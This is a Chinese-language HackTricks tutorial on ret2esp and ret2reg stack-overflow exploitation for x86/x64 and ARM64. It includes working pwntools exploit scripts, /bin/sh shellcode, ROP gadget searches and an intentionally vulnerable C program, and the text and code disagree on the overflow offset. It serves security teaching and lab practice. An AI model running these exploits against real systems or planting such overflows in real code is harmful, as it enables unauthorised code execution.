Ret2esp / Ret2reg

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

支持HackTricks的其他方式:

Ret2esp

由于ESP(堆栈指针)始终指向堆栈顶部,这种技术涉及将EIP(指令指针)替换为**jmp espcall esp**指令的地址。通过这样做,shellcode被放置在被覆盖的EIP之后。当ret指令执行时,ESP指向下一个地址,恰好是shellcode存储的位置。

如果在Windows或Linux中未启用地址空间布局随机化(ASLR),可以使用在共享库中找到的jmp espcall esp指令。然而,启用ASLR后,可能需要在受影响的程序内部寻找这些指令(您可能需要击败PIE)。

此外,能够将shellcode放置在EIP损坏之后,而不是在堆栈中间,确保在函数运行过程中执行的任何pushpop指令不会干扰shellcode。如果shellcode放置在函数堆栈的中间,可能会发生干扰。

空间不足

如果您在覆盖RIP后缺少写入空间(也许只有几个字节),可以编写一个初始的**jmp** shellcode,例如:

sub rsp, 0x30
jmp rsp

示例

您可以在https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp中找到此技术的示例,最终利用如下:

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

jmp_rsp = next(elf.search(asm('jmp rsp')))

payload = b'A' * 120
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 10;
jmp rsp;
''')

pause()
p.sendlineafter('RSP!\n', payload)
p.interactive()

你可以在https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html中看到这种技术的另一个示例。在未启用NX的情况下发生了缓冲区溢出,使用了一个小工具来减少$esp的地址,然后使用jmp esp;跳转到shellcode:

# From https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html
from pwn import *

# Establish the target process
target = process('./b0verflow')
#gdb.attach(target, gdbscript = 'b *0x080485a0')

# The shellcode we will use
# I did not write this, it is from: http://shell-storm.org/shellcode/files/shellcode-827.php
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

# Establish our rop gadgets

# 0x08048504 : jmp esp
jmpEsp = p32(0x08048504)

# 0x080484fd : push ebp ; mov ebp, esp ; sub esp, 0x24 ; ret
pivot = p32(0x80484fd)

# Make the payload

payload = ""
payload += jmpEsp # Our jmp esp gadget
payload += shellcode # Our shellcode
payload += "1"*(0x20 - len(shellcode)) # Filler between end of shellcode and saved return address
payload += pivot # Our pivot gadget

# Send our payload
target.sendline(payload)

# Drop to an interactive shell
target.interactive()

Ret2reg

类似地,如果我们知道一个函数返回存储shellcode的地址,我们可以利用**call eaxjmp eax指令(称为ret2eax技术),提供另一种执行我们的shellcode的方法。就像eax一样,包含有趣地址的任何其他寄存器**都可以被使用(ret2reg)。

示例

您可以在这里找到一些示例:

ARM64

Ret2sp

在ARM64中,没有允许跳转到SP寄存器的指令。可能会找到一个将sp移动到寄存器然后跳转到该寄存器的gadget,但在我的kali libc中找不到类似的gadget:

for i in `seq 1 30`; do
ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei "[mov|add] x${i}, sp.* ; b[a-z]* x${i}( |$)";
done

我发现的唯一方法是更改在跳转到它之前复制 sp 的寄存器的值(因此它将变得无用):

Ret2reg

如果一个寄存器有一个有趣的地址,只需找到适当的指令就可以跳转到它。您可以使用类似以下的内容:

ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei " b[a-z]* x[0-9][0-9]?";

在ARM64架构中,是**x0**存储函数的返回值,因此可能是x0存储了由用户控制的缓冲区的地址,其中包含要执行的shellcode。

示例代码:

// clang -o ret2x0 ret2x0.c -no-pie -fno-stack-protector -Wno-format-security -z execstack

#include <stdio.h>
#include <string.h>

void do_stuff(int do_arg){
if (do_arg == 1)
__asm__("br x0");
return;
}

char* vulnerable_function() {
char buffer[64];
fgets(buffer, sizeof(buffer)*3, stdin);
return buffer;
}

int main(int argc, char **argv) {
char* b = vulnerable_function();
do_stuff(2)
return 0;
}

检查函数的反汇编代码,可以看到缓冲区的地址(容易受到缓冲区溢出攻击并由用户控制)在从缓冲区溢出返回之前被**存储在x0**中:

在**do_stuff函数中也可以找到br x0**这个gadget:

我们将使用该gadget跳转到它,因为二进制文件是没有启用PIE编译的。使用模式可以看到缓冲区溢出的偏移量为80,因此利用将是:

from pwn import *

p = process('./ret2x0')
elf = context.binary = ELF('./ret2x0')

stack_offset = 72
shellcode = asm(shellcraft.sh())
br_x0 = p64(0x4006a0) # Addr of: br x0;
payload = shellcode + b"A" * (stack_offset - len(shellcode)) + br_x0

p.sendline(payload)
p.interactive()

如果使用类似于**read**而不是fgets,只需覆盖返回地址的最后2个字节即可绕过PIE,返回到br x0;指令,而无需知道完整地址。由于fgets会在末尾添加空字符(0x00),所以这种方法不起作用。

保护机制

  • NX:如果堆栈不可执行,则无法帮助,因为我们需要将 shellcode 放在堆栈中并跳转执行它。

  • ASLRPIE:这些保护机制可以使查找跳转到 esp 或任何其他寄存器的指令变得更加困难。

参考资料

从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)

支持 HackTricks 的其他方式:

最后更新于